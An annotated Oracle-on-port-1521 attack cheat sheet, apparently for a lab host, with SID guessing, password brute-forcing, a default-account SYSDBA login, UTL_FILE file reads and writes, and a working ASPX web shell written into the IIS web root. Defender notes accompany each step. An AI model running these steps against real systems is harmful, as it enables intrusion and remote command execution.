Oracle SQL | 1521
Scan SIDs
# Sends connection attempts with candidate SID names to the listener at 10.10.10.82 to learn which ones exist.
# Defender note: every wrong guess is a refused connect, so a burst of unknown-SID errors (ORA-12505)
# from one client in the listener log is the pattern to alert on.
odat sidguesser -s 10.10.10.82
Brute force Passwords
# Tries the credentials listed in the accounts file against SID XE on 10.10.10.82.
# Defender note: a FAILED_LOGIN_ATTEMPTS limit in the user profile locks an account after repeated
# failures, auditing failed logons (ORA-01017) exposes the attempt, and locking unused default
# accounts removes the easy matches.
odat passwordguesser -s 10.10.10.82 -d XE --accounts-file /usr/share/odat/accounts/accounts.txt
Log in to the database with SQL*Plus
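## ------------------| Setup
sudo apt-get install oracle-instantclient-sqlplus
# Shows where sqlplus resolves from; no output means it is not on PATH yet.
which sqlplus
# The 19.6 directory must match the client version the package actually installed; adjust it if it differs.
export ORACLE_HOME=/usr/lib/oracle/19.6/client64
# Prepend instead of overwrite, so library paths already set in this shell are kept.
export LD_LIBRARY_PATH="$ORACLE_HOME/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"
export PATH="$ORACLE_HOME/bin:$PATH"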
## ------------------| Login as user
# Connects to service/SID XE on port 1521 with the given account.
# Caveat: a password typed on the command line is visible in the local process list and is kept in
# shell history; leaving out /'<PASSWORD>' makes sqlplus prompt for it instead.
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE
## ------------------| Login as superuser
# "as sysdba" requests a SYSDBA connection; it is granted only if the account holds that privilege.
# scott/tiger is Oracle's well-known sample account. Hardening: lock or drop sample and default
# accounts, and review who holds SYSDBA (v$pwfile_users).
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus queries
-- System privileges currently available to this session (granted directly or through enabled roles).
SELECT *
FROM session_privs;

-- Roles granted to the connected user.
-- Review note: broad grants on an application account (for example the DBA role) are a
-- least-privilege finding in their own right.
SELECT *
FROM user_role_privs;
Read File
-- Reads the first line of iisstart.htm from /inetpub/wwwroot on the database server and prints it.
-- UTL_FILE performs the I/O inside the server process, so the read uses that process's OS
-- permissions rather than the client's.
-- Hardening: this works only while the account can execute UTL_FILE and the location is allowed
-- for it (a directory object, or the legacy utl_file_dir setting); revoking EXECUTE on UTL_FILE
-- from PUBLIC and limiting directory grants reduces the exposure.
SET SERVEROUTPUT ON
DECLARE
    fh       utl_file.file_type;
    line_buf VARCHAR(5000);
BEGIN
    fh := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
    -- A single get_line call: only the first line of the file is fetched.
    utl_file.get_line(fh, line_buf);
    utl_file.fclose(fh);
    -- Visible in SQL*Plus because SERVEROUTPUT was switched on above.
    dbms_output.put_line(line_buf);
END;
# Hit enter then type '/' and hit enter
Write File
-- Writes one line of marker text to h4rith.txt under /inetpub/wwwroot through UTL_FILE.
-- A successful write shows that the database server process can create files in that directory.
-- Hardening: the OS account running the database should have no write access to web content
-- directories, and file-integrity monitoring on the web root will surface files created this way.
DECLARE
    fh      utl_file.file_type;
    payload VARCHAR(5000) := 'h4rithd was there';
BEGIN
    -- Mode 'W' opens the file for writing.
    fh := utl_file.fopen('/inetpub/wwwroot', 'h4rith.txt', 'W');
    utl_file.put_line(fh, payload);
    utl_file.fclose(fh);
END;
# Hit enter then type '/' and hit enter
Write web shell (aspx)
-- Writes the string literal below to h4rithd.aspx under /inetpub/wwwroot through UTL_FILE.
-- The literal is a single-file ASPX page that passes a submitted form value to cmd.exe and returns
-- the output. If that directory is served with ASP.NET enabled, database file-write access becomes
-- OS command execution under whatever identity the web application runs as.
-- Detection: a new .aspx file in the web root created by the database service process, and a web
-- worker process starting cmd.exe.
-- Mitigation: deny the database service account write access to web content directories, revoke
-- EXECUTE on UTL_FILE from accounts that do not need it, and keep the database and the web server
-- on separate hosts where possible.
declare
f utl_file.file_type;
s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
f := utl_file.fopen('/inetpub/wwwroot','h4rithd.aspx','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
# Hit enter then type '/' and hit enter